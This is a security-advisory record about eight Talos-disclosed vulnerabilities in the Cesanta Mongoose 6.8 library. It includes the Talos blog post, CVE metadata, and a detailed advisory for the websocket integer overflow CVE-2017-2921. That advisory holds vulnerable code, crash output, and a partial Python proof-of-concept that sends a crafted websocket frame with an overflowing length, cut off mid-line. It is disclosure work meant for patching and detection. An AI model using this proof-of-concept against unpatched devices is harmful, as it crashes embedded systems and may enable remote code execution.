Vulnerability Spotlight: Multiple Vulnerabilities in Cesanta Mongoose Server

2017-10-31T08:12:00

Description

<i>These vulnerabilities were discovered by Aleksandar Nikolic of Cisco Talos</i><br /><br />Today, Talos is disclosing several vulnerabilities that have been identified in Cesanta Mongoose server. <br /><br />Cesanta Mongoose is a library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms. The small size of the software enables any Internet-connected device to function as a web server. Mongoose is available under GPL v2 and commercial licenses.<br /> All these discovered vulnerabilities are fixed in version <a href="https://github.com/cesanta/mongoose/releases/tag/6.10">6.10</a> of the library. <br /><br /><a name='more'></a><br /><br /><h2 id="h.t35gb7jnv6c3">Vulnerability Details</h2><br /><h3 id="h.p7ist89g16m5">TALOS-2017-0398 (CVE-2017-2891) - Cesanta Mongoose HTTP Server CGI Remote Code Execution Vulnerability</h3><br /><a href="http://www.talosintelligence.com/reports/TALOS-2017-0398">TALOS-2017-0398</a> manifests itself as an exploitable use-after-free vulnerability that exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of a previously freed pointer potentially resulting in remote code execution. An attacker needs to send this HTTP request over the network to trigger this vulnerability.<br /><br /><h3 id="h.bm8o08jc6uoq">TALOS-2017-0399 (CVE-2017-2892) - Cesanta Mongoose MQTT Payload Length Remote Code Execution</h3><br /><a href="http://www.talosintelligence.com/reports/TALOS-2017-0399">TALOS-2017-0399</a> manifests itself as an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an out of bounds and arbitrary memory read and write, potentially resulting in information disclosure, denial of service and remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id="h.nlmk6epmqnt6">TALOS-2017-0400 (CVE-2017-2893) - Cesanta Mongoose MQTT SUBSCRIBE Command Denial Of Service</h3><br /><a href="http://www.talosintelligence.com/reports/TALOS-2017-0400">TALOS-2017-0400</a> describes an exploitable NULL pointer dereference vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to a server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id="h.8tgqw5hpxxx3">TALOS-2017-0401 (CVE-2017-2894) - Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution</h3><br /><a href="http://www.talosintelligence.com/reports/TALOS-2017-0401">TALOS-2017-0401</a> is an exploitable stack buffer overflow vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id="h.cx86aeyjt9mm">TALOS-2017-0402 (CVE-2017-2895) - Cesanta Mongoose MQTT SUBSCRIBE Topic Length Information Leak</h3><br /><a href="http://www.talosintelligence.com/reports/TALOS-2017-0402">TALOS-2017-0402</a> documents an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an out of bounds and arbitrary memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id="h.cr2a58dhmjy1">TALOS-2017-0416 (CVE-2017-2909) - Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service</h3><br /><a href="http://www.talosintelligence.com/reports/TALOS-2017-0416">TALOS-2017-0416</a> describes an infinite loop programming error that exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. An attacker can send a packet over the network to trigger this vulnerability. <br /><br /><h3 id="h.yl3fl4awfow9">TALOS-2017-0428 (CVE-2017-2921) - Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability</h3><br /><a href="http://www.talosintelligence.com/reports/TALOS-2017-0428">TALOS-2017-0428</a> is an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow leading to a heap buffer overflow resulting in denial of service and potentially remote code execution. An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.<br /><br /><h3 id="h.dj3eivlw70fj">TALOS-2017-0429 (CVE-2017-2922) - Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability</h3><br /><a href="http://www.talosintelligence.com/reports/TALOS-2017-0429">TALOS-2017-0429</a> describes an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which can lead to use-after-free vulnerability that can be exploited to achieve remote code execution. An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.<br /><br />For the full technical details of these vulnerabilities, please refer to the vulnerability advisories that are posted on our website:<br /><br /><a href="http://www.talosintelligence.com/vulnerability-reports/">http://www.talosintelligence.com/vulnerability-reports/</a><br /><br /><h2 id="h.f31c7khmn6lo">Discussion</h2><br />IoT devices often have limited processing and memory resources but they also require lightweight and resilient communications protocols. One of the protocols frequently used for IoT and mobile messaging applications is MQ Telemetry Transport (MQTT).<br /><br /><a href="http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html">MQTT</a> is a lightweight network protocol used for publish/subscribe messaging between devices. MQTT is a standard protocol accepted by the OASIS consortium for the adoption of open standards. <br /><br />The protocol is designed to be open, simple and easy to implement, allowing thousands of lightweight clients to be supported by a single server. The design attempts to minimize bandwidth requirements while attempting to ensure reliability of delivery.<br /><br />Cesanta Mongoose is a popular communications library designed for implementation as a lightweight embedded library supporting several server and client application layer protocols, such as <a href="https://www.w3.org/Protocols/">HTTP</a>, MQTT, <a href="https://www.w3.org/TR/2011/WD-websockets-20110929/">WebSockets</a>, <a href="https://www.isc.org/community/rfcs/dns/">DNS</a> and <a href="https://tools.ietf.org/html/rfc7252">CoAP</a>. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms.<br /><br />These vulnerabilities discovered by Talos may allow attackers to take over implementations of vulnerable versions of the Cesanta Mongoose server and control individual devices as well as the associated servers running it. Users are recommended to work with the affected device vendors to ensure that the latest security patches for Cesanta Mongoose are applied to all vulnerable devices and applications. <br /><br /><h2 id="h.610e9o9vgbc4">Coverage</h2><br />The following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org.<br /><br />Snort Rules: <br /><br /><ul><li>23039 - 23040</li></ul><br /><br /><div class="feedflare"> <a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=geK06cY9cxs:QobJuzBhpB0:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"></img></a> </div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/geK06cY9cxs" height="1" width="1" alt=""/>

{"bulletinFamily": "blog", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "lastseen": "2017-12-25T19:52:52", "references": [], "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/geK06cY9cxs/vulnerability-spotlight-multiple_31.html", "type": "talosblog", "cvelist": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"], "enchantments_done": [], "title": "Vulnerability Spotlight: Multiple Vulnerabilities in Cesanta Mongoose Server", "id": "TALOSBLOG:BF9B74979C194FA29647576078478DE0", "description": "<i>These vulnerabilities were discovered by Aleksandar Nikolic of Cisco Talos</i><br /><br />Today, Talos is disclosing several vulnerabilities that have been identified in Cesanta Mongoose server. <br /><br />Cesanta Mongoose is a library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms. The small size of the software enables any Internet-connected device to function as a web server. Mongoose is available under GPL v2 and commercial licenses.<br /> All these discovered vulnerabilities are fixed in version <a href=\"https://github.com/cesanta/mongoose/releases/tag/6.10\">6.10</a> of the library. <br /><br /><a name='more'></a><br /><br /><h2 id=\"h.t35gb7jnv6c3\">Vulnerability Details</h2><br /><h3 id=\"h.p7ist89g16m5\">TALOS-2017-0398 (CVE-2017-2891) - Cesanta Mongoose HTTP Server CGI Remote Code Execution Vulnerability</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0398\">TALOS-2017-0398</a> manifests itself as an exploitable use-after-free vulnerability that exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of a previously freed pointer potentially resulting in remote code execution. An attacker needs to send this HTTP request over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.bm8o08jc6uoq\">TALOS-2017-0399 (CVE-2017-2892) - Cesanta Mongoose MQTT Payload Length Remote Code Execution</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0399\">TALOS-2017-0399</a> manifests itself as an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an out of bounds and arbitrary memory read and write, potentially resulting in information disclosure, denial of service and remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.nlmk6epmqnt6\">TALOS-2017-0400 (CVE-2017-2893) - Cesanta Mongoose MQTT SUBSCRIBE Command Denial Of Service</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0400\">TALOS-2017-0400</a> describes an exploitable NULL pointer dereference vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to a server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.8tgqw5hpxxx3\">TALOS-2017-0401 (CVE-2017-2894) - Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0401\">TALOS-2017-0401</a> is an exploitable stack buffer overflow vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.cx86aeyjt9mm\">TALOS-2017-0402 (CVE-2017-2895) - Cesanta Mongoose MQTT SUBSCRIBE Topic Length Information Leak</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0402\">TALOS-2017-0402</a> documents an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an out of bounds and arbitrary memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.cr2a58dhmjy1\">TALOS-2017-0416 (CVE-2017-2909) - Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0416\">TALOS-2017-0416</a> describes an infinite loop programming error that exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. An attacker can send a packet over the network to trigger this vulnerability. <br /><br /><h3 id=\"h.yl3fl4awfow9\">TALOS-2017-0428 (CVE-2017-2921) - Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0428\">TALOS-2017-0428</a> is an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow leading to a heap buffer overflow resulting in denial of service and potentially remote code execution. An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.dj3eivlw70fj\">TALOS-2017-0429 (CVE-2017-2922) - Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0429\">TALOS-2017-0429</a> describes an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which can lead to use-after-free vulnerability that can be exploited to achieve remote code execution. An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.<br /><br />For the full technical details of these vulnerabilities, please refer to the vulnerability advisories that are posted on our website:<br /><br /><a href=\"http://www.talosintelligence.com/vulnerability-reports/\">http://www.talosintelligence.com/vulnerability-reports/</a><br /><br /><h2 id=\"h.f31c7khmn6lo\">Discussion</h2><br />IoT devices often have limited processing and memory resources but they also require lightweight and resilient communications protocols. One of the protocols frequently used for IoT and mobile messaging applications is MQ Telemetry Transport (MQTT).<br /><br /><a href=\"http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html\">MQTT</a> is a lightweight network protocol used for publish/subscribe messaging between devices. MQTT is a standard protocol accepted by the OASIS consortium for the adoption of open standards. <br /><br />The protocol is designed to be open, simple and easy to implement, allowing thousands of lightweight clients to be supported by a single server. The design attempts to minimize bandwidth requirements while attempting to ensure reliability of delivery.<br /><br />Cesanta Mongoose is a popular communications library designed for implementation as a lightweight embedded library supporting several server and client application layer protocols, such as <a href=\"https://www.w3.org/Protocols/\">HTTP</a>, MQTT, <a href=\"https://www.w3.org/TR/2011/WD-websockets-20110929/\">WebSockets</a>, <a href=\"https://www.isc.org/community/rfcs/dns/\">DNS</a> and <a href=\"https://tools.ietf.org/html/rfc7252\">CoAP</a>. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms.<br /><br />These vulnerabilities discovered by Talos may allow attackers to take over implementations of vulnerable versions of the Cesanta Mongoose server and control individual devices as well as the associated servers running it. Users are recommended to work with the affected device vendors to ensure that the latest security patches for Cesanta Mongoose are applied to all vulnerable devices and applications. <br /><br /><h2 id=\"h.610e9o9vgbc4\">Coverage</h2><br />The following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org.<br /><br />Snort Rules: <br /><br /><ul><li>23039 - 23040</li></ul><br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=geK06cY9cxs:QobJuzBhpB0:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/geK06cY9cxs\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-10-31T15:59:27", "reporter": "noreply@blogger.com (Vanja Svajcer)", "published": "2017-10-31T08:12:00", "enchantments": {"score": {"value": 1.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2017-1001"]}, {"type": "cve", "idList": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-2891", "DEBIANCVE:CVE-2017-2892", "DEBIANCVE:CVE-2017-2893", "DEBIANCVE:CVE-2017-2894", "DEBIANCVE:CVE-2017-2895", "DEBIANCVE:CVE-2017-2909", "DEBIANCVE:CVE-2017-2921", "DEBIANCVE:CVE-2017-2922"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-2893", "RH:CVE-2017-2921"]}, {"type": "seebug", "idList": ["SSV:96806", "SSV:96807", "SSV:96808", "SSV:96809", "SSV:96811", "SSV:96831", "SSV:96834", "SSV:96835"]}, {"type": "talos", "idList": ["TALOS-2017-0398", "TALOS-2017-0399", "TALOS-2017-0400", "TALOS-2017-0401", "TALOS-2017-0402", "TALOS-2017-0416", "TALOS-2017-0428", "TALOS-2017-0429"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-2891", "UB:CVE-2017-2892", "UB:CVE-2017-2893", "UB:CVE-2017-2894", "UB:CVE-2017-2895", "UB:CVE-2017-2909", "UB:CVE-2017-2921", "UB:CVE-2017-2922"]}]}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2017-1001"]}, {"type": "cve", "idList": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-2891", "DEBIANCVE:CVE-2017-2892", "DEBIANCVE:CVE-2017-2893", "DEBIANCVE:CVE-2017-2894", "DEBIANCVE:CVE-2017-2895", "DEBIANCVE:CVE-2017-2909", "DEBIANCVE:CVE-2017-2921", "DEBIANCVE:CVE-2017-2922"]}, {"type": "seebug", "idList": ["SSV:96806", "SSV:96807", "SSV:96808", "SSV:96809", "SSV:96811", "SSV:96835"]}, {"type": "talos", "idList": ["TALOS-2017-0398", "TALOS-2017-0399", "TALOS-2017-0400", "TALOS-2017-0401", "TALOS-2017-0402", "TALOS-2017-0416", "TALOS-2017-0428", "TALOS-2017-0429"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-2891", "UB:CVE-2017-2892", "UB:CVE-2017-2893", "UB:CVE-2017-2894", "UB:CVE-2017-2895", "UB:CVE-2017-2909", "UB:CVE-2017-2921", "UB:CVE-2017-2922"]}]}, "exploitation": null, "vulnersScore": 1.1}, "viewCount": 33, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1660008386}, "_internal": {"score_hash": "328772214de79234b1998db5e6839b57"}}

{"redhatcve": [{"lastseen": "2022-05-21T01:24:59", "description": "An exploitable NULL pointer dereference vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-20T23:50:57", "type": "redhatcve", "title": "CVE-2017-2893", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"], "modified": "2022-05-20T23:50:57", "id": "RH:CVE-2017-2893", "href": "https://access.redhat.com/security/cve/cve-2017-2893", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-05-21T01:24:59", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, leading to a heap buffer overflow and resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-20T23:55:38", "type": "redhatcve", "title": "CVE-2017-2921", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"], "modified": "2022-05-20T23:55:38", "id": "RH:CVE-2017-2921", "href": "https://access.redhat.com/security/cve/cve-2017-2921", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "talos": [{"lastseen": "2022-06-13T22:03:01", "description": "### Summary\n\nAn exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow resulting leading to heap buffer overflow resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-190: Integer Overflow or Wraparound\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. Its HTTP implementation includes upgrade support required for websocket applications. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nAfter the initial websocket handshake and while parsing a websocket packet, an integer overflow involving header length and packet size can occur. Insufficient checks after the potential overflow can later lead to very large memory overwrite which can result in heap memory corruption, process crash and potentially in remote code execution.\n \n \n Function `mg_deliver_websocket_data` is responsible for parsing the websocket packet. Relevant code is:\n \n \n \n uint64_t i, data_len = 0, frame_len = 0, buf_len = nc->recv_mbuf.len, len, [1]\n mask_len = 0, header_len = 0;\n ...\n if (buf_len >= 2) \n ...\n else if (buf_len >= 10 + mask_len) \n header_len = 10 + mask_len; [2]\n data_len = (((uint64_t) ntohl(*(uint32_t *) &buf[2])) << 32) + [3]\n ntohl(*(uint32_t *) &buf[6]);\n \n \n \n frame_len = header_len + data_len; [4]\n ok = frame_len > 0 && frame_len <= buf_len; [5]\n \n if (ok) \n ...\n /* Apply mask if necessary */\n if (mask_len > 0) { \n for (i = 0; i < data_len; i++) \n buf[i + header_len] ^= (buf + header_len - mask_len)[i % 4]; [6]\n \n\nIn the above code, we can see at [1] local variables `frame_len`, `header_len` and `data_len` being declared as 64bit unsigned integers. At [2] header length is calculated since websocket protocol specifies variable length headers. At [3], 8 bytes from the packet are used as `data_len` directly. At [4], total `frame_len` is calculated and at [5] basic sanity checks are performed. If everything is ok, and the packet has mask bit set, at [6] all the data in the buffer is XORed with 4 byte mask.\n\nAn insufficient check above at [5] can allow for an integer overflow to pass undetected. In case `data_len`is a very large value, adding `header_len` to it can lead to integer wraparound , resulting in small `frame_len` value. Small `frame_len` value passes `frame_len <= buf_len` check, while `data_len` is still huge and bigger than the actual buffer size. This results in a large heap overflow at [6] as the for loop is bounded by `data_len` only.\n\nThis causes the process to crash, leading to denial of service and in some cases potentially to remote code execution.\n\n### Crash Information\n \n \n Address sanitizer output:\n \n ==88164==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000006380 at pc 0x00000051abae bp 0x7fffffffb490 sp \n 0x7fffffffb488\n READ of size 1 at 0x619000006380 thread T0\n #0 0x51abad in mg_deliver_websocket_data /home/user/mongoose/examples/websocket_chat/../../mongoose.c:8866\n #1 0x51abad in ?? ??:0\n #2 0x5128d4 in mg_ws_handler /home/user/mongoose/examples/websocket_chat/../../mongoose.c:9045 (discriminator 1)\n #3 0x5128d4 in ?? ??:0\n #4 0x4f9de6 in mg_call /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2051\n #5 0x4f9de6 in ?? ??:0\n #6 0x4fdcf9 in mg_recv_common /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2502\n #7 0x4fdcf9 in ?? ??:0\n #8 0x506603 in mg_if_recv_tcp_cb /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2506\n #9 0x506603 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3372\n #10 0x506603 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497\n #11 0x506603 in ?? ??:0\n #12 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\n #13 0x509dd8 in ?? ??:0\n #14 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\n #15 0x4fb695 in ?? ??:0\n #16 0x4ea65a in main /home/user/mongoose/examples/websocket_chat/websocket_chat.c:78\n #17 0x4ea65a in ?? ??:0\n #18 0x7ffff6ee582f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\n #19 0x7ffff6ee582f in ?? ??:0\n #20 0x418e58 in _start ??:?\n #21 0x418e58 in ?? ??:0\n \n \n 0x619000006380 is located 0 bytes to the right of 1024-byte region [0x619000005f80,0x619000006380)\n allocated by thread T0 here:\n #0 0x4b8f88 in __interceptor_malloc ??:?\n #1 0x4b8f88 in ?? ??:0\n #2 0x506453 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3336 (discriminator 1)\n #3 0x506453 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497 (discriminator 1)\n #4 0x506453 in ?? ??:0\n #5 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\n #6 0x509dd8 in ?? ??:0\n #7 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\n #8 0x4fb695 in ?? ??:0\n #4 0x60200000efef (<unknown module>)\n \n SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/mongoose/examples/websocket_chat/websocket_chat+0x51abad)\n Shadow bytes around the buggy address:\n 0x0c327fff8c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n =>0x0c327fff8c70:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n Shadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07\n Heap left redzone: fa\n Heap right redzone: fb\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack partial redzone: f4\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n ==88164==ABORTING\n \n\n### Exploit Proof-of-Concept\n \n \n import socket\n import struct\n import sys\n http_upgrade = ('GET /chat HTTP/1.1\\r\\n'\n 'Host: server.example.com\\r\\n'\n 'Upgrade: websocket\\r\\n'\n 'Connection: Upgrade\\r\\n'\n 'Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\\r\\n'\n 'Sec-WebSocket-Protocol: chat, superchat\\r\\n'\n 'Sec-WebSocket-Version: 13\\r\\n'\n 'Origin: http://example.com\\r\\n\\r\\n')\n #only HTTP \"Upgrade: websocket\" header matters above, the above GET request was copied verbatim from wikipedia\n \n \n payload = \"\\x00\" # FIN flag doesn't matter, opcode doesn't matter\n payload += chr(0x80 | 127 ) # mask is set, payload len of 127 means next 64 bits are actual payload len\n payload_len = 0xffffffffffffffff -12 #actual payload len\n payload += struct.pack(\"!Q\",payload_len)\n masking_key = 0 #masking key can be anything, and would need to be a specific value in real exploit\n payload += 